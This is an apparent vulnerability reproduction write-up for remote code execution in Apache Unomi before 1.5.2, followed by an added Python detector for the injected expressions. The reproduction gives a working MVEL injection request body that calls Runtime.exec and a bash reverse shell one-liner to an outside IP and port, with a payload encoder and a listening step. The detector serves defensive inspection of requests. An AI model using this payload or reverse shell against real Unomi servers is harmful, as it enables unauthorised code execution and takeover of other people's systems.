Introduction
Apache Unomi is an open source customer data platform written in Java: a server designed to manage the data of customers, prospects and visitors and to help personalize the customer experience. Unomi can be used to integrate personalization and profile management into very different systems (CMS, CRM, issue trackers, native mobile apps, etc.).
Vulnerability description
Apache Unomi allows remote attackers to send malicious requests containing MVEL and OGNL expressions that may reference arbitrary classes, resulting in remote code execution (RCE) with the privileges of the Unomi application.
Affected version
Apache Unomi < 1.5.2
Vulnerability reproduction
Capture the request to the homepage:
Modify the captured request:
Keep the following fields:
Change the method to POST and add the headers:
Content-Type: application/json
Content-Length: 0
Add the PoC body:
{
  "filters": [
    {
      "id": "sample",
      "filters": [
        {
          "condition": {
            "parameterValues": {
              "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"ping DNSlog\");"
            },
            "type": "profilePropertyCondition"
          }
        }
      ]
    }
  ],
  "sessionId": "sample"
}
Replace DNSlog with your own DNS logging domain.
View the result:
Reverse shell:
The reverse shell command to encode:
bash -i >&/dev/tcp/192.168.133.149/7777 0>&1
Encoder used: http://www.jackson-t.ca/runtime-exec-payloads.html
Listen on Kali:
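Added example, not part of the original write-up: a small detector, run over request bodies of the shape shown above, that walks the nested "filters" tree and flags any "parameterValues" entry carrying the "script::" prefix that marks an MVEL expression in this PoC (the OGNL vector the description mentions is not shown on the page and is not covered). The sample bodies are constructed for the example; the path names and the pattern are assumptions based on the PoC, not Unomi's own API.

```python
import json
import re

# Constructed sample bodies (not real captures) modelled on the PoC's /context.json shape.
BENIGN_BODY = json.dumps({
    "filters": [{"id": "vip", "filters": [{"condition": {
        "type": "profilePropertyCondition",
        "parameterValues": {"propertyName": "properties.segment",
                            "comparisonOperator": "equals", "propertyValue": "vip"}}}]}],
    "sessionId": "sample"})

SUSPICIOUS_BODY = json.dumps({
    "filters": [{"id": "sample", "filters": [{"condition": {
        "type": "profilePropertyCondition",
        "parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\"ping DNSlog\");"}}}]}],
    "sessionId": "sample"})

# Prefix used in the PoC to hand a value to the MVEL evaluator (assumed marker).
SCRIPT_PREFIX = re.compile(r"^\s*script::", re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively visit dicts/lists; record parameterValues strings with the script:: prefix."""
    if isinstance(node, dict):
        for key, value in node.items():
            child_path = f"{path}.{key}" if path else key
            if key == "parameterValues" and isinstance(value, dict):
                for pname, pval in value.items():
                    if isinstance(pval, str) and SCRIPT_PREFIX.match(pval):
                        findings.append((f"{child_path}[{pname!r}]", pval[:80]))
            _walk(value, child_path, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def find_script_expressions(body):
    """Return [(json_path, expression_snippet), ...] for a request body; empty means clean.
    A body that is not valid JSON is reported as a finding rather than silently skipped."""
    try:
        doc = json.loads(body)
    except ValueError as e:
        return [("<body>", f"unparseable JSON: {e}")]
    findings = []
    _walk(doc, "", findings)
    return findings


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, find_script_expressions(body))
```

The check is a request-inspection heuristic for logs or a WAF layer; it does not replace upgrading to a fixed Unomi release.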